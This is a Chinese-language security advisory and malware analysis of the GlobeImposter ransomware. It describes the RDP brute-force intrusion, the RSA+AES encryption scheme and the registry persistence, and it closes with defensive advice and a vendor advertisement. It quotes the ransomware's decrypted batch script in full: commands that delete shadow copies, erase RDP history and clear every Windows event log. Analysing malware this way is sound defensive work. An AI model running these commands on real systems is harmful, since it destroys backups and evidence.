GlobeImposter勒索病毒
GlobeImposter勒索病毒變種攻擊的主要方式仍是暴力破解RDP遠(yuǎn)程登錄密碼后,再進(jìn)一步在內(nèi)網(wǎng)橫向滲透。值得注意的是,與近期其他版本勒索病毒主要針對(duì)服務(wù)器以及數(shù)據(jù)庫(kù)文件加密不同,此次爆發(fā)的GlobeImposter勒索病毒并不區(qū)分被入侵機(jī)器是否服務(wù)器,一旦入侵成功后直接感染。除個(gè)別路徑外,所有文件都被加密為后輟名為“WALKER”的文件。
GlobeImposter勒索病毒在一段時(shí)間內(nèi)并無(wú)實(shí)質(zhì)性技術(shù)更新,近日在部分企業(yè)內(nèi)網(wǎng)爆發(fā),對(duì)個(gè)人電腦用戶影響較小。來(lái)古計(jì)算機(jī)提醒企業(yè)用戶高度重視近期GlobeImposter勒索病毒的破壞行為,提前備份關(guān)鍵業(yè)務(wù)系統(tǒng),避免遭遇勒索病毒破壞之后業(yè)務(wù)系統(tǒng)出現(xiàn)嚴(yán)重?fù)p失。
對(duì)于已經(jīng)中毒的系統(tǒng),來(lái)古計(jì)算機(jī)建議在內(nèi)網(wǎng)下線處理,病毒清理完畢才能重新接入網(wǎng)絡(luò)。內(nèi)網(wǎng)其他未中毒的電腦,使用弱口令登錄的建議盡快修改,使用由字母、數(shù)字和特殊字符組合的復(fù)雜密碼,避免攻擊者暴力破解成功(企業(yè)網(wǎng)管可配置強(qiáng)制使用強(qiáng)壯密碼,杜絕使用弱密碼登錄)。
及時(shí)修復(fù)操作系統(tǒng)補(bǔ)丁,避免因漏洞導(dǎo)致攻擊入侵事件發(fā)生;終端用戶若不使用遠(yuǎn)程桌面登錄服務(wù),建議關(guān)閉;局域網(wǎng)內(nèi)已發(fā)生勒索病毒入侵的,可暫時(shí)關(guān)閉135,139,445端口(暫時(shí)禁用Server服務(wù))以減少遠(yuǎn)程入侵的可能。
GlobeImposter勒索病毒影響評(píng)級(jí)
高危,黑客首先會(huì)入侵企業(yè)內(nèi)網(wǎng),之后再通過(guò)暴力破解RDP和SMB服務(wù)在內(nèi)網(wǎng)繼續(xù)擴(kuò)散。除個(gè)別文件夾外,都被加密,除非得到密鑰,受損文件無(wú)法解密還原。
GlobeImposter勒索病毒影響面
Windows系統(tǒng)的電腦會(huì)被波及,目前,御見威脅情報(bào)中心發(fā)現(xiàn)廣東、河南、黑龍江等地已有多個(gè)企業(yè)受害,預(yù)計(jì)近期還會(huì)有增加。
GlobeImposter勒索病毒樣板分析
1. 入侵分析
從某感染用戶機(jī)器上可以看到,8月25日至8月26日凌晨有大量445端口爆破記錄
攻擊源是內(nèi)網(wǎng)中非本地區(qū)的某臺(tái)機(jī)器,顯示該企業(yè)內(nèi)各地分公司都已存在相應(yīng)風(fēng)險(xiǎn)。
2. 樣本分析
加密算法說(shuō)明
勒索病毒使用了RSA+AES加密方式,加密過(guò)程中涉及兩對(duì)RSA密鑰(分別為黑客公私鑰和用戶公私鑰,分別用hacker_rsa_xxx和user_rsa_xxx表示這兩對(duì)密鑰)和一對(duì)AES密鑰。黑客RSA密鑰用于加密用戶RSA密鑰,用戶RSA密鑰用于加密AES密鑰,AES密鑰用于加密文件內(nèi)容。
具體的加密過(guò)程為:
勒索病毒首先解碼出一個(gè)內(nèi)置的RSA公鑰(hacker_rsa_pub),同時(shí)對(duì)每個(gè)受害用戶,使用RSA生成公私鑰(user_rsa_pub和user_rsa_pri),其中生成的密鑰信息使用內(nèi)置的RSA公鑰(hacker_rsa_Public)進(jìn)行加密后,作為用戶ID。在遍歷系統(tǒng)文件,對(duì)符合加密要求的文件進(jìn)行加密。對(duì)每個(gè)文件,通過(guò)CoCreateGuid生成一個(gè)唯一標(biāo)識(shí)符,并由該唯一標(biāo)識(shí)符最終生成AES密鑰(記為file_aes_key),對(duì)文件進(jìn)行加密。在加密文件的過(guò)程中,該唯一標(biāo)識(shí)符會(huì)通過(guò)RSA公鑰 (user_rsa_pub) 加密后保存到文件中。
黑客在收到贖金、用戶ID和文件后,通過(guò)自己的私鑰(hacker_rsa_pri)解密用戶ID,可以得到user_rsa_pri,使用user_rsa_pri解密文件,就可以得到文件的file_aes_key,進(jìn)而可以通過(guò)AES算法解密出原始文件。
3. 自啟動(dòng)分析
惡意代碼樣本為了防止被輕易地分析,加密了大多數(shù)字符串和一部分API,運(yùn)行后會(huì)在內(nèi)存中動(dòng)態(tài)解密,解密后可以看到樣本在加密時(shí)排除的文件夾與后綴名。首先獲取環(huán)境變量“%LOCALAPPADATA%”、“%APPDATA%”的路徑,若獲取不到則退出;獲取到后,將自身拷貝到該目錄下,然后添加自啟動(dòng)項(xiàng)。
復(fù)制之后,將路徑寫到以下注冊(cè)表項(xiàng)中
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\BrowserUpdateCheck,使得自身能夠開機(jī)自啟動(dòng)
4. 加密過(guò)程分析
獲取當(dāng)前機(jī)器上每個(gè)盤符:
對(duì)每個(gè)盤符分別創(chuàng)建一個(gè)線程,進(jìn)行文件加密
加密文件前,首先會(huì)過(guò)濾掉后綴為.WALKER,文件名為HOW_TO_BACK_FILES.html以及保存用戶ID的文件,此外還會(huì)過(guò)濾掉如下路徑下的文件:
然后進(jìn)行加密
GlobeImposter對(duì)文件的加密使用的是AES加密算法。AES加密的KEY在本地隨機(jī)生成。首先AES加密時(shí)的IV參數(shù)由當(dāng)前文件的大小和文件路徑共同生成。IV參數(shù)將MD(filesize|| filename )后取前16位。
將IV與另外生成的secret key使用MBEDTLS_MD_SHA256計(jì)算2次HASH,并將HASH結(jié)果做為AES加密的KEY
隨后,使用內(nèi)置的RSA公鑰將guid進(jìn)行加密,并將加密過(guò)的guid及用戶ID寫入到當(dāng)前文件中
最后用AES加密文件內(nèi)容
5. 自刪除分析
通過(guò)調(diào)用CMD /c del,來(lái)進(jìn)行自刪除
在Temp目錄下,釋放.bat腳本文件,主要用來(lái)刪除遠(yuǎn)程桌面連接信息文件default.rdp,并通過(guò)wevtutil.exe cl命令刪除日志信息
解密出來(lái)的bat文件內(nèi)容如下
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
來(lái)古計(jì)算機(jī)建議企業(yè)采用以下解決方案
1. 全網(wǎng)安裝專業(yè)的終端安全管理軟件,由管理員批量殺毒和安裝補(bǔ)丁,后續(xù)定期更新各類系統(tǒng)高危補(bǔ)丁。
2. 部署流量監(jiān)控/阻斷類設(shè)備/軟件,便于事前發(fā)現(xiàn),事中阻斷和事后回溯。
3. 建議由于其他原因不能及時(shí)安裝補(bǔ)丁的系統(tǒng),考慮在網(wǎng)絡(luò)邊界、路由器、防火墻上設(shè)置嚴(yán)格的訪問(wèn)控制策略,以保證網(wǎng)絡(luò)的動(dòng)態(tài)安全。
4. 建議對(duì)于存在弱口令的系統(tǒng),需在加強(qiáng)使用者安全意識(shí)的前提下,督促其修改密碼,或者使用策略來(lái)強(qiáng)制限制密碼長(zhǎng)度和復(fù)雜性。
5. 建議對(duì)于存在弱口令或是空口令的服務(wù),在一些關(guān)鍵服務(wù)上,應(yīng)加強(qiáng)口令強(qiáng)度,同時(shí)需使用加密傳輸方式,對(duì)于一些可關(guān)閉的服務(wù)來(lái)說(shuō),建議關(guān)閉不要的服務(wù)端口以達(dá)到安全目的。不使用相同口令管理多臺(tái)關(guān)鍵服務(wù)器。
6. 建議網(wǎng)絡(luò)管理員、系統(tǒng)管理員、安全管理員關(guān)注安全信息、安全動(dòng)態(tài)及最新的嚴(yán)重漏洞,攻與防的循環(huán),伴隨每個(gè)主流操作系統(tǒng)、應(yīng)用服務(wù)的生命周期。
7. 建議對(duì)數(shù)據(jù)庫(kù)賬戶密碼策略建議進(jìn)行配置,對(duì)最大錯(cuò)誤登錄次數(shù)、超過(guò)有效次數(shù)進(jìn)行鎖定、密碼有效期、到期后的寬限時(shí)間、密碼重用等策略進(jìn)行加固設(shè)置。
8. 建議對(duì)數(shù)據(jù)庫(kù)的管理訪問(wèn)節(jié)點(diǎn)地址進(jìn)行嚴(yán)格限制,只允許特定管理主機(jī)IP進(jìn)行遠(yuǎn)程登錄數(shù)據(jù)庫(kù)。
為防止黑客入侵,需要更加完善的防護(hù)體系:各終端使用專業(yè)殺毒軟件,防止病毒攻擊。對(duì)于管理者而言,可以使用集終端殺毒統(tǒng)一管控、修復(fù)漏洞統(tǒng)一管控,以及策略管控等全方位安全管理功能于一體的安全產(chǎn)品,以便全面了解、管理企業(yè)內(nèi)網(wǎng)安全狀況、保護(hù)企業(yè)安全。
除此之外,在內(nèi)網(wǎng)部署高級(jí)威脅檢測(cè)系統(tǒng)、態(tài)勢(shì)感知平臺(tái)和網(wǎng)絡(luò)空間風(fēng)險(xiǎn)雷達(dá)等產(chǎn)品,有助于在終端安全、邊界安全、網(wǎng)站監(jiān)測(cè)、統(tǒng)一監(jiān)控方面建立一套集風(fēng)險(xiǎn)監(jiān)測(cè)、分析、預(yù)警、響應(yīng)和可視化為一體的安全體系,全方位立體化保障企業(yè)用戶的網(wǎng)絡(luò)安全,及時(shí)阻止黑客入侵。
為防止遭勒索病毒攻擊,各企業(yè)用戶應(yīng)及時(shí)給服務(wù)器打好安全補(bǔ)丁,盡量關(guān)閉不必要的文件共享、端口和服務(wù),采用高強(qiáng)度的唯一服務(wù)器帳號(hào)/密碼并定期更換,對(duì)沒(méi)有互聯(lián)需求的服務(wù)器/工作站內(nèi)部訪問(wèn)設(shè)置訪問(wèn)控制,在終端電腦上使用騰訊 御點(diǎn)防御病毒木馬攻擊。
同時(shí),推薦企業(yè)用戶關(guān)鍵業(yè)務(wù)配置備份系統(tǒng),將重要業(yè)務(wù)數(shù)據(jù)創(chuàng)建多個(gè)備份和異地備份,避免備份數(shù)據(jù)也被勒索病毒破壞。一旦有病毒感染事件發(fā)生,也可快速恢復(fù)重建業(yè)務(wù)系統(tǒng),避免重大損失發(fā)生。
個(gè)人用戶可及時(shí)安裝操作系統(tǒng)漏洞補(bǔ)丁,安全備份重要數(shù)據(jù)及文件,同時(shí)開啟文檔守護(hù)者以免遭勒索病毒破壞。
軟件開發(fā)、計(jì)算機(jī)硬件及打印設(shè)備、網(wǎng)絡(luò)信息安全技術(shù)防護(hù)、數(shù)字視頻監(jiān)控、企業(yè)數(shù)據(jù)機(jī)房組建請(qǐng)找來(lái)古計(jì)算機(jī)
